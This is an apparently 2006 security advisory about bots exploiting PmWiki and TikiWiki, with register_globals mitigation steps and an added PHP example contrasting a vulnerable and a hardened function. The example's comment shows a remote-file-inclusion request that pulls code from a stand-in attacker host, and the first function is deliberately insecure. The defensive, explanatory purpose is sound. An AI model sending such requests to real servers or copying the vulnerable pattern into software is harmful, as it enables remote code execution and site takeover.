We have received some anonymous reports of botnets being built by exploiting vulnerabilities in PmWiki and TikiWiki.
The TikiWiki exploit targets versions <= 1.9, and the PmWiki exploit targets versions <= 2.1.19. Both exploits were discovered and written by the same person, and both have been worked into self-propagating bots.
The PmWiki exploit only works if register_globals is set to On in your PHP configuration. The TikiWiki exploit works regardless of that setting.
We have no information yet on where these bots attempt to connect. However, we are seeing them in the wild.
TikiWiki has published information on its website on how to temporarily patch your systems so they are no longer vulnerable. From reading that page, it also appears that TikiWiki is working on a permanent patch.
At the time of this posting, PmWiki had no temporary fix or patch posted on its website. So make sure register_globals is set to Off in php.ini (register_globals = Off) and restart Apache, then confirm the change with phpinfo() or "php -i".
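To show why the register_globals setting matters for the PmWiki case above (and why turning it off is the right mitigation), here is an added example. It is constructed code, not PmWiki's or TikiWiki's, and it does not reproduce the actual exploit: $authorized, $libdir, authenticated_user() and admin.php are made-up names. The first function shows the bug class that register_globals = On exposes, the second a hardened equivalent that also refuses to run while the setting is on.

```php
<?php
// Added example: constructed code, not PmWiki's or TikiWiki's own source.
// Illustrates the bug class register_globals = On exposes and one way to harden it.
// $authorized, $libdir, authenticated_user() and admin.php are assumed names.

// ---------- Vulnerable form ----------
// Neither $authorized nor $libdir is initialised before use. With
// register_globals = On, PHP turns every request parameter into a global
// before the script runs, so a request such as
//   GET /index.php?authorized=1&libdir=http://attacker.example/
// pre-seeds both variables: the authorisation check passes and include()
// pulls code from an attacker-chosen location (a remote URL when
// allow_url_fopen/allow_url_include permit it, or a local path otherwise).
function vulnerable_page() {
    global $authorized, $libdir;
    if (authenticated_user()) {
        $authorized = true;
    }
    if ($authorized) {                      // already true if the request said so
        include $libdir . '/admin.php';     // prefix controlled by the attacker
    }
}

// ---------- Hardened form ----------
// 1. Every variable is assigned before it is read, so request data cannot
//    pre-seed it even if register_globals happens to still be on.
// 2. Input is read only from $_GET and checked against a whitelist.
// 3. The script refuses to run at all while register_globals is enabled.
function hardened_page() {
    if (ini_get('register_globals')) {      // "" or "0" when off or unsupported
        header('HTTP/1.0 500 Internal Server Error');
        exit('register_globals is On; set register_globals = Off and restart Apache');
    }
    $authorized = false;                    // explicit default, never trusted from input
    $libdir = dirname(__FILE__) . '/lib';   // fixed, never request-controlled
    if (authenticated_user()) {
        $authorized = true;
    }
    $allowed_pages = array('admin' => 'admin.php', 'view' => 'view.php');
    $page = isset($_GET['page']) ? $_GET['page'] : 'view';
    if (!isset($allowed_pages[$page])) {
        $page = 'view';                     // anything not whitelisted falls back
    }
    if ($authorized) {
        include $libdir . '/' . $allowed_pages[$page];
    }
}

function authenticated_user() {
    // Placeholder for the application's real session check (assumed).
    return isset($_SESSION['user']);
}
```

The server-side fix is the one the diary recommends: register_globals = Off in php.ini, or php_admin_flag register_globals off in httpd.conf (php_flag register_globals off in .htaccess where AllowOverride permits it), followed by an Apache restart. The ini_get() guard in the hardened function is a belt-and-braces check that catches a host where the setting was silently left on.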
So, if you are running either of these two packages, please make sure you are fixed or patched up!
Sep 5th 2006